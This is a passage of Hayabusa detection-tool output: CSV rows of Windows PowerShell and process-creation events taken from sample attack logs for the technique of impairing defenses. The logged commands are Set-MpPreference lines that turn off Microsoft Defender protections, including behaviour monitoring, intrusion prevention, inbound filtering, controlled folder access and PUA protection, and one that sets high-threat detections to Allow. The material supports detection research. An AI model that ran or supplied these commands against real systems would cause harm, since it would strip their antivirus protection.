value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx 2021-10-06 18:34:50.962 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx 2021-10-06 18:34:50.986 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx 2021-10-06 18:34:50.989 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx 2021-10-06 18:34:50.999 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx 2021-10-06 18:34:51.010 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -DisableBehaviorMonitoring $true,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx 2021-10-06 18:34:51.070 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""True"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx 2021-10-06 18:34:51.071 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx 2021-10-06 18:34:51.088 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx 2021-10-06 18:34:51.091 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx 2021-10-06 18:34:51.106 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx 2021-10-06 18:34:51.118 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -DisableIntrusionPreventionSystem $true,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx 2021-10-06 18:34:51.134 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""True"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx 2021-10-06 18:34:51.134 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx 2021-10-06 18:34:51.151 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx 2021-10-06 18:34:51.155 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx 2021-10-06 18:34:52.339 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx 2021-10-06 18:34:52.355 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -DisableInboundConnectionFiltering $true,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx 2021-10-06 18:34:52.423 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""True"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx 2021-10-06 18:34:52.423 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx 2021-10-06 18:34:52.430 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx 2021-10-06 18:34:52.432 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx 2021-10-06 18:46:09.533 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -command ""Set-MpPreference -EnableControlledFolderAccess Disabled"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x242c | User: admmig | LID: 0x5f72fee",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx 2021-10-06 18:46:13.168 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -command ""Set-MpPreference -PUAProtection disable"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x21f4 | User: admmig | LID: 0x5f72fee",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx 2021-10-06 18:46:28.683 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1bcc | User: WIN10-02$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx 2021-10-06 19:08:33.314 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender default action allow any (PowerShell).evtx 2021-10-06 19:08:33.362 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -HighThreatDefaultAction 6 -Force,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender default action allow any (PowerShell).evtx 2021-10-06 19:08:33.671 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""HighThreatDefaultAction""; value=""Allow"" ParameterBinding(Set-MpPreference): name=""Force""; value=""True"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; 